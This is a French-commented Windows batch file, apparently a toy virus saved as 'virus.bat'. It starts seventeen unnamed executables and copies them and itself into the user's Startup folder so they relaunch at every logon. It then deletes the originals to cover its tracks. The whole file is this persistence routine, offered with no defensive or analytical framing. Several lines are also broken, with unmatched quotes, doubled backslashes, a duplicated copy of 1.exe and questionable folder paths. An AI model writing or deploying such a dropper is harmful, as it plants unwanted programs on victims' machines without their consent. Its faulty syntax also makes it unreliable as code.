@echo off
REM Ouvrir les fichiers .exe
start "1" "1.exe"
start "2" "2.exe"
start "3" "3.exe"
start "4" "4.exe"
start "5" "5.exe"
start "6" "6.exe"
start "7" "7.exe"
start "8" "8.exe"
start "9" "9.exe"
start "10" "10.exe"
start "11" "11.exe"
start "12" "12.exe"
start "13" "13.exe"
start "14" "14.exe"
start "15" "15.exe"
start "16" "16.exe"
start "17" "17.exe"

REM Copier les fichiers vers le dossier de démarrage
copy "1.exe" "%APPDATA%\\Microsoft\\Windows\\Start Menu\\Programmes\\Démarrage"
copy "1.exe" %APPDATA%\\Microsoft\\Windows\\Start Menu\\Programmes\\Démarrage"
copy "2.exe" %APPDATA%\\Microsoft\\Windows\\Start Menu\\Programmes\\Démarrage"
copy "3.exe" %APPDATA%\\Microsoft\\Windows\\Start Menu\\Programmes\\Démarrage"
copy "4.exe" %APPDATA%\\Microsoft\\Windows\\Start Menu\\Programmes\\Démarrage"
copy "5.exe" %APPDATA%\\Microsoft\\Windows\\Start Menu\\Programmes\\Démarrage"
copy "6.exe" %APPDATA%\\Microsoft\\Windows\\Start Menu\\Programmes\\Démarrage"
copy "7.exe" %APPDATA%\\Microsoft\\Windows\\Start Menu\\Programmes\\Démarrage"
copy "8.exe" %APPDATA%\\Microsoft\\Windows\\Start Menu\\Programmes\\Démarrage"
copy "9.exe" %APPDATA%\\Microsoft\\Windows\\Start Menu\\Programmes\\Démarrage"
copy "10.exe" %APPDATA%\\Microsoft\\Windows\\Start Menu\\Programmes\\Démarrage"
copy "11.exe" %APPDATA%\\Microsoft\\Windows\\Start Menu\\Programmes\\Démarrage"
copy "12.exe" %APPDATA%\\Microsoft\\Windows\\Start Menu\\Programmes\\Démarrage"
copy "13.exe" %APPDATA%\\Microsoft\\Windows\\Start Menu\\Programmes\\Démarrage"
copy "14.exe" %APPDATA%\\Microsoft\\Windows\\Start Menu\\Programmes\\Démarrage"
copy "15.exe" %APPDATA%\\Microsoft\\Windows\\Start Menu\\Programmes\\Démarrage"
copy "16.exe" %APPDATA%\\Microsoft\\Windows\\Start Menu\\Programmes\\Démarrage"
copy "17.exe" %APPDATA%\\Microsoft\\Windows\\Start Menu\\Programmes\\Démarrage"
copy "virus.bat" "%APPDATA%\\Microsoft\\Windows\\Start Menu\\Programmes\\Démarrage"

REM Supprimer les fichiers du dossier d'exécution original
del "1.exe"
del "2.exe"
del "3.exe"
del "4.exe"
del "5.exe"
del "6.exe"
del "7.exe"
del "8.exe"
del "9.exe"
del "10.exe"
del "11.exe"
del "12.exe"
del "13.exe"
del "14.exe"
del "15.exe"
del "16.exe"
del "17.exe"
del "virus.bat"
